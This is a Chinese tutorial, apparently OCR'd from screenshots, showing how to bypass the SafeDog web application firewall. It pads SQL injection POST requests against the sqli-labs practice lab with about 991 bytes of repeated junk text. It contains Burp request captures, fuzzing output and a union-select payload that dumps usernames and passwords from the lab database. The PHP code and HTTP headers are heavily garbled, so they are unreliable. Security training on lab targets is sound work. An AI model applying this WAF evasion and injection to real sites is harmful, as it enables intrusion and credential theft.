测试版本:apache3.5.12048版本
0x01 测试条件
这个是get请求的,要求对方可以接收post请求,也就是说对方应该是REQUEST接收方式。
测试所使用的靶场为sqli-labs靶场
需要对sql注入的流程清楚,如果基础只是比较薄弱的同学,请移步到以下链接地址进行学习sqli-labs
https://space.bilibili.com/29903122
Nm<LO
<?php
//includingtheMysqlconnectparameters.
include("../sq1-connections/sgl-connect.php"
errorreporting(0)
I
take
id"]))
if(iss($
REQUEST
SiP-SREQUEST['id"];
connectionparameterstoafileforanalysis
//1oggingt
the
$fp-fopen('resuit.txt',a)
fwrite($pID:Sidn
fa1ose($fp);
4
25
//
connectivity
在发送请求的时候,要将bp的请求方式修改为post型
Headers
Params
Hex
Raw
POSThttp://10.211.55.9/Less-1/HTTP/1.1
User-Agent:Mozilla/5.0Macintoh;x
Gecko/20100101Firefox/83.0
Accept:
text/html,appication/xhtml+xm.alication/xmq.w/
Accept-Language:
zh-cNzhq..
Accept-encoding:gzip,deflate
DNT:1
Connection:close
cookie:safedog-flowitmB997255C2337E9B4E56A9ECAB186C267
Upgrade-lnsecure-Requests:1
Content-Type:application/x-www-form-urlencoded
Content-Length:4072
id--1
Headers
Params
Hex
Raw
POSThttp://10.211.55.9/Less-1/HTTP/1.1
User-Agent:Mozilla/5.0Macintoh;x
Gecko/20100101Firefox/83.0
Accept:
text/html,appication/xhtml+xm.alication/xmq.w/
Accept-Language:
zh-cNzhq..
Accept-encoding:gzip,deflate
DNT:1
Connection:close
cookie:safedog-flowitmB997255C2337E9B4E56A9ECAB186C267
Upgrade-lnsecure-Requests:1
Content-Type:application/x-www-form-urlencoded
Content-Length:4072
id--1
将安全狗的cc防攻击功能关闭,放置在测试中因为请求次数过多被ban
网站安全狗CAPAC版)3.5正式版本
加入服云
网站安全狗
精报
资源保护
网马查杀
IP黑白名单
流量保护
防护日志
主动防御
CC攻击防护
修改拦截提示信息
cC攻击防护功能已关闭
人.
保存
智能拦截非法的网站攻击请求,保护网站安全
访问规则设置访问上限
+口
+
一
网站白名单
路径白名单
秒内(1-60)允许最大请求数目
10
100
5
分钟
IP冻结时间:
分钟
IP放行时间:
30
会话验证设置验证访问者合法性规则
启用智能验证模式
初级模式:该模式对攻击验证判断较为宽松
(正常情况下推荐使用该模式).
代理规则设置代理访问规则
最大IP数
(-1允许,0禁止)
30
时间周期
秒(1-60)
1
网马库版本:2016-01-15
检查更新
主程序版本:3.5,12048
0x02 代码
截图:4位字母从991开始就可以绕过了
53foriin.range(991,992):
str(lcrow']
/*
火
问题
调试控制台
输出
终端
984
userful
not
userful
985
not
userful
986
not
987
not
userful
988
not
userful
989
not
userful
userful
990
not
payloadlength:
userful
[+]
991
current
payloadlength:
userful
992
+]
current
payloadlength:
userful
993
+]
CurrenT
userfulpayload
length:994
+
Current
userfulpayload
length:995
+]
Current
userfulpayload
length:996
+
current
userfulpayload
length:99
997
+
Current
userfulpayload
Length:998
+
Current
userfulpayload
length:C
999
+
Current
userfulpayload
Length;
1000
+
CurrenT
userfulpayload
length:
1001
+
CurrenT
rful
Length:
1002
payload
+
CurrenT
use
rfulpayload
Length:
1003
+
Current
uS
navload
1A0A
ength.
991基础版:
crow * 4
当然,这里可以将crow换成任意的4个普通字符(最好不要特殊字符)
0x03 手动测试
3
ME
4
食
邮
10.211.55.9/Less1/id-la
Send
Cancel
Reguest
Raw
ParamsHeaders
Hex
POSThtt://10.211.55.9Less-/HP/1.1
WelcomeDhakkan
Host:10.211.55.9
YourLoginname:2
User-Agent:Mozilla/5.0Mcintocx
Gecko/20100101Firefox/83.0
YourPassword:security
Accept:
text/html.application/xhtml+xmlapplication/xmlg-0.9imwe.8
Accept-Language:
SQLIDUMB
zh-cN.zh.
Accept-Encoding:gzip,deflate
DNT:1
Connection:close
Cookiesafdog-flowitm997255233794E56A9ECAB186C267
Upgrade-lnsecure-Requests:1
Content-Type:applircation/x-www-formurlencoded
可无障碍环境
你网络
0内存
存储
制台
样式编辑器
性能
词试器
AdblockPr
HackBar
Content-Length:51
odingSQL-xSSOTHER
id--1
CROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWC
ttp://10.211.55.9/Less-/id--unionelct2taba
FOWCROWCROWCROWCROWCYOWCROWCYOWCROWCROWCROWCROWCROWCROWCROWCROWCRO
WCIOWCOWCIOWCIOWCROWCIOWCROWCROWCIOWCROWCIOWCIOWCROWCIOWCIOWCROWC
OWCROWCROWCROWCROWCROWCROWCUOWCROWCUOWCROWCROWCROWCROWCROWCROWCRO
WCOWCIOWCIOWCROWCIOWCIOWCROWCIOWCIONCROWCIOWCIOWCROWCIOWCIOWCROWC
PostdataDRefereroUserAgentOCookies
ClearAll
TOWCROWCROWCIOWCROWCIOWCROWCROWCROWCROWCROWCROWCYOWCROWCROWCROWCRO
WCROWCROWCIOWCROWCROWCROWCROWCOWCROWCROWCIOWCROWCROWCIOWCROWCROWC
FOWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCIOWCIOWCO
WCIOWCOWCIOWCIOWCROWCIOWCROWCIOWCIOWCEOWCIONCROWCIOWCROWCIOWCIOWC
OWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCEO
WCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWE
ROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCRO
WCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWE
FOWCROWCOWCOWCROWCOWCROWCROWCOWCROWCOWCROWCROWCROWCROWCOWCO
WCIOWCROWCIOWCIOWCROWCIOWCROWCIOWCROWCROWCIONCROWCIOWCROWCROWCIOWC
TOWCROWCOWCROWCROWCROWCROWCIOWCROWCUOWCROWCROWCIOWCROWCIOWCROWCEO
WCIOWCOWCIOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWC
TOWCROWCIOWCROWCIOWCROWCROWCROWCROWCUOWCROWCROWCOWCROWCOWCROWCRO
WCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCROWCROWCROWCROWC
OWCOWCIOWCIOWCIOWCIOWCIOWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCCO
WCIOWCOWCOWCIOWCEOWCIOWCOWCIOWCIOWCEOWCIOWCEOWCOWCIOWCEOWCIOWC
0matc
Typeasearchterm
继续测试:
group_concat(concat_ws(0x7e,username,password)) from security.users --+
Reguest
Response
Hex
Render
Headers
HTML
Raw
Headers
Params
Hex
Raw
YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCIOWCROWCEO
<IDOCTYPEhtmLPUBLICW3C|/DTDXHTML1.0Tansitional/EN"
WCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWC
"http://www.w3.g//xhtml/DTD/xhtm/l-transtionld
YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCRO
<htmlxmlns-"http://www.w3.org/1999/xhtml>
WCIOWCROWCIOWCROWCROWCROWCROWCROWCIOWCROWCIOWCROWCIOWCROWCROWCROWC
<head>
YOWCIOWCOWCIOWCIOWCROWCIOWCROWCROWCROWCROWCROWCROWCRIOWCROWCROWCRO
<metahttp-equiv-content-Typecontent-text/htmlcharset-utf-82
WCIOWCROWCIOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWC
<title>Less-1**ErrorBased-stringtitle>
YOWCIOWCROWCEOWCIOWCROWCROWCROWCROWCROWCRONCROWCIOWCROWCIOWCROWCRO
</head>
WCIOWCROWCROWCROWCROWCROWCRIOWCROWCRIOWCIOWCRIOWCIOWCROWCIOWCROWCIOWC
YOWCIOWCROWCIOWCIOWCIOWCIOWCROWCIOWCROWCIOWCROWCIOWCEOWCIOWCEOWCEO
<bodybgcolor#000000'>
WCIOWCROWCIOWCROWCROWCROWCRIOWCROWCROWCROWCROWCIOWCROWCIOWCROWCIOWC
<divstyle-"margin-top:70pxicolor.#FFF;font-size:23px
YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCROWCROWCRO
text-align:centerwelcomenbsp&inbspnpotcolo
WCIOWCOWCIOWCROWCIOWCROWCIOWCROWCIOWCTOWCIOWCTOWCIOWCTOWCIOWCIOWC
Dhakkan</font><br>
YOWCIOWCROWCEOWCIOWCEOWCROWCROWCIOWCROWCIOWCOWCIOWCIOWCEOWCIOWCEO
<fontsize-"3"color-"#FFFFoO">
WCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCEOWCIOWCROWCIOWCROWCIOWCROWC
YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCRO
WCIOWCOWCTOWCOWCIOWCROWCIOWCEOWCIOWCOWCIOWCTOWCIOWCTOWCOWCIOWC
YOWCIOWCROWCIOWCIOWCROWCIOWCROWCROWCROWCIOWCROWCROWCROWCROWCROWCRO
WCIOWCOWCIOWCROWCROWCROWCIOWCEOWCIOWCEOWCIOWCHOWCIOWCEOWCIOWCHOWC
YOWCIOWCROWCIOWCIOWCROWCIOWCROWCROWCROWCIOWCROWCIOWCIOWCIOWCIOWCEO
WCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCOWCIOWCTOWCIOWCTOWCIOWCIOWC
YOWCIOWCROWCIOWCIOWCIOWCIOWCROWCROWCROWCYOWCROWCIOWCROWCIOWCROWCRO
WCIOWCROWCIOWCROWCROWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWC
<Fontsize-5color#99FfoOYourLoginnaMe.2<Your
[owCrOWCOWCONCROWCEOWCROWCROWCROWCOWCROWCROWCROWCIOWCEOWCIOWCO
PasswordDumb-Dumbnin-i-uwere
WCIOWCROWCIOWCROWCROWCROWCIOWCROWCIOWCROWCROWCIOWCROWCIOWCROWCIOWC
YOWCIOWCROWCIOWCIOWCROWCROWCROWCROWCROWCIONCROWCIOWCIOWCIOWCIOWCEO
rappy,tuid-stuidityuiuli
n.dmini~admin1.dmin~dminimi.kku
WCIOWCOWCIOWCOWCIOWCIOWCEIOWCIOWCEIOWCIOWCRIOWCIOWCROWCIOWCROWCIOWC
min4~admin4</fontu/font<divx/brxbrxibrccenter
YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCIOWCROWCIOWCROWCEO
<imgsrc-../iages/Less-1jpg>kcenter>
WCIOWCROWCROWCROWCROWCROWCRIOWCROWCRIOWCROWCRIOWCIOWCROWCIOWCROWCIOWC
/body
YOWCYOWCROWCEOWCRIOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCRO
/html
WCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWC
YOWCYOWCROWCROWCROWCROWCRYOWCROWCROWCROWCROWCROWCYOWCROWCROWCROWCRO
WCIOWCOWCIOWCROWCIOWCROWCIONCROWCIOWCTOWCIONCTOWCIOWCTOWCIOWCROWC
YOWCIOWCROWCIOWCIOWCROWCROWCROWCROWCROWCIOWCROWCIOWCROWCROWCIOWCO
WCIOWCOWCIOWCROWCROWCROWCIOWCROWCIOWCEOWCIOWCROWCIOWCROWCIOWCROWC
YOWCIOWCROWCIOWCIOWCIOWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCEO
wcrow/unionselect1.2unctw
fromsecurity.users
成功
0x04 对应视频
微信在线观看(腾讯视频上传的视频好像不可以上传作为一个系列的教程):
01_sql注入之安全狗超大数据包bypass
02_sql注入之安全狗超大数据包bypass
03_sql注入之安全狗超大数据包bypass
